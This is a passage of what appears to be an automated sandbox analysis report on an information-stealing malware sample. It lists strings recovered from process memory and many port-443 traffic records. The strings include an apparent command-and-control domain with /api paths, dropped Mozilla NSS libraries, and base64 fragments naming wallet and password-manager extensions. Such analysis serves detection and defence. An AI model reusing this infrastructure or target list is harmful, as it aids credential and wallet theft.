Source: file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, buildd.exe, 0000000E.00000002.2504854833.000001DBB8A3E000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555997742.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555074919.0000000005457000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2683862699.0000000005687000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2684219896.0000000005628000.00000004.00000800.00020000.00000000.sdmp, JJDBFCAE.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, buildd.exe, 0000000E.00000002.2504854833.000001DBB8A3E000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555997742.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555074919.0000000005457000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2683862699.0000000005687000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2684219896.0000000005628000.00000004.00000800.00020000.00000000.sdmp, JJDBFCAE.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, buildd.exe, 0000000E.00000002.2504854833.000001DBB8A3E000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555997742.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555074919.0000000005457000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2683862699.0000000005687000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2684219896.0000000005628000.00000004.00000800.00020000.00000000.sdmp, JJDBFCAE.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: ed55d3f620.exe, 0000001A.00000003.2658375154.00000000007F9000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2700117064.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2784521506.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2700281753.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2784614993.0000000001002000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2740036344.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000FFB000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2716445296.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2734146790.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2739397365.0000000000FED000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2753600795.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2714618817.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2867187034.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/
Source: ed55d3f620.exe, 0000001A.00000003.2726803106.00000000007FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/7
Source: ed55d3f620.exe, 0000001E.00000003.2784521506.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/P
Source: ed55d3f620.exe, 0000001E.00000003.2784521506.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/api
Source: ed55d3f620.exe, 0000001A.00000003.2726803106.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2781955825.00000000007FD000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2658375154.00000000007F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/api&
Source: ed55d3f620.exe, 0000001A.00000003.2658375154.00000000007F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/api.
Source: ed55d3f620.exe, 0000001A.00000003.2726803106.00000000007FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/apiF
Source: ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2784521506.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/apib
Source: ed55d3f620.exe, 0000001E.00000003.2714804318.0000000000FF7000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2739303850.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000FFB000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2766842170.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2739915074.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2734146790.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2714618817.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2867187034.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/apider
Source: ed55d3f620.exe, 0000001E.00000003.2700117064.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/apieed
Source: ed55d3f620.exe, 0000001A.00000003.2534323513.0000000000791000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/apii
Source: ed55d3f620.exe, 0000001A.00000003.2726936709.0000000000802000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2726803106.00000000007FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/apipyy
Source: ed55d3f620.exe, 0000001E.00000003.2784521506.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/h
Source: ed55d3f620.exe, 0000001E.00000003.2784521506.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/pi
Source: ed55d3f620.exe, 0000001A.00000003.2726803106.00000000007FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/pi.
Source: ed55d3f620.exe, 0000001A.00000003.2658375154.00000000007F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/s
Source: ed55d3f620.exe, 0000001E.00000003.2784521506.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/vo
Source: ed55d3f620.exe, 0000001A.00000003.2676616593.000000000080E000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000002.2902465184.0000000000F55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store:443/api
Source: ed55d3f620.exe, 0000001A.00000003.2551431732.00000000007F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store:443/api4
Source: ed55d3f620.exe, 0000001E.00000003.2734146790.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: ed55d3f620.exe, 0000001A.00000003.2554297584.000000000545F000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2683512167.000000000568F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: KECFIDGCBFBAKEBFBKFBFBAFII.0.dr	String found in binary or memory: https://support.mozilla.org
Source: KECFIDGCBFBAKEBFBKFBFBAFII.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: ed55d3f620.exe, 0000001E.00000003.2716518989.0000000005939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: KECFIDGCBFBAKEBFBKFBFBAFII.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, 00000000.00000003.1853989950.000000001D81D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1988015001.0000000000856000.00000040.00000001.01000000.00000003.sdmp, buildd.exe, 0000000E.00000002.2504854833.000001DBB8A25000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2554628898.0000000005406000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2554297584.000000000545D000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2683655971.0000000005636000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2683512167.000000000568D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000002.1988015001.0000000000856000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY
Source: file.exe, 00000000.00000002.1988015001.0000000000856000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: buildd.exe, 0000000E.00000002.2504854833.000001DBB8A01000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2554628898.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2683655971.0000000005612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: file.exe, 00000000.00000002.1988015001.0000000000856000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Java
Source: file.exe, 00000000.00000002.1988015001.0000000000856000.00000040.00000001.01000000.00000003.sdmp, buildd.exe, 0000000E.00000002.2504854833.000001DBB8A25000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2554628898.0000000005406000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2554297584.000000000545D000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2683655971.0000000005636000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2683512167.000000000568D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: buildd.exe, 0000000E.00000002.2504854833.000001DBB8A01000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2554628898.00000000053E2000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2683655971.0000000005612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: ed55d3f620.exe, 0000001A.00000002.2854365732.00000000053E0000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2754049186.0000000001003000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2740115306.0000000001000000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2739303850.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2740190223.0000000001007000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2739915074.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2754276104.000000000100B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl
Source: file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2734146790.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: ed55d3f620.exe, 0000001A.00000003.2534263654.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2534323513.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2534323513.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2669560404.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2669405621.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2669441404.0000000000F91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: ed55d3f620.exe, 0000001A.00000003.2534323513.00000000007AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/acces
Source: ed55d3f620.exe, 0000001E.00000003.2669560404.0000000000F9A000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2669441404.0000000000F91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-manage
Source: ed55d3f620.exe, 0000001A.00000003.2534263654.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2669405621.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, buildd.exe, 0000000E.00000002.2504854833.000001DBB8A3E000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555997742.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555074919.0000000005457000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2683862699.0000000005687000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2684219896.0000000005628000.00000004.00000800.00020000.00000000.sdmp, JJDBFCAE.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2734267620.000000000100C000.00000004.00000020.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2734146790.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: ed55d3f620.exe, 0000001A.00000002.2854365732.00000000053E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKEb
Source: file.exe, 00000000.00000002.1989629326.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, buildd.exe, 0000000E.00000002.2504854833.000001DBB8A3E000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555997742.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2555074919.0000000005457000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2683862699.0000000005687000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2684219896.0000000005628000.00000004.00000800.00020000.00000000.sdmp, JJDBFCAE.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: KECFIDGCBFBAKEBFBKFBFBAFII.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.1988015001.0000000000884000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1988015001.0000000000856000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: KECFIDGCBFBAKEBFBKFBFBAFII.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000002.1988015001.0000000000884000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: KECFIDGCBFBAKEBFBKFBFBAFII.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000002.1988015001.0000000000884000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1988015001.0000000000856000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.1933393214.0000000023B87000.00000004.00000020.00020000.00000000.sdmp, buildd.exe, 0000000E.00000002.2504854833.000001DBB8AFA000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2604763993.0000000005501000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2716518989.0000000005939000.00000004.00000800.00020000.00000000.sdmp, KECFIDGCBFBAKEBFBKFBFBAFII.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000002.1988015001.0000000000884000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
Source: file.exe, 00000000.00000002.1988015001.0000000000884000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
Source: KECFIDGCBFBAKEBFBKFBFBAFII.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.1988015001.0000000000884000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1988015001.0000000000856000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000002.1988015001.0000000000856000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/d=enterpk2016&ui=en-us&rs=en-us&ad=us
Source: file.exe, 00000000.00000002.1988015001.0000000000856000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/d=enterpk2016&ui=en-us&rs=en-us&ad=usGF8aHBnbGZoZ2ZuaGJncGpk
Source: file.exe, 00000000.00000002.1988015001.0000000000856000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/d=enterpk2016&ui=en-us&rs=en-us&ad=usWFwa21ibGlvYnwxfDB8MHxM
Source: file.exe, 00000000.00000003.1933393214.0000000023B87000.00000004.00000020.00020000.00000000.sdmp, buildd.exe, 0000000E.00000002.2504854833.000001DBB8AFA000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001A.00000003.2604763993.0000000005501000.00000004.00000800.00020000.00000000.sdmp, ed55d3f620.exe, 0000001E.00000003.2716518989.0000000005939000.00000004.00000800.00020000.00000000.sdmp, KECFIDGCBFBAKEBFBKFBFBAFII.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
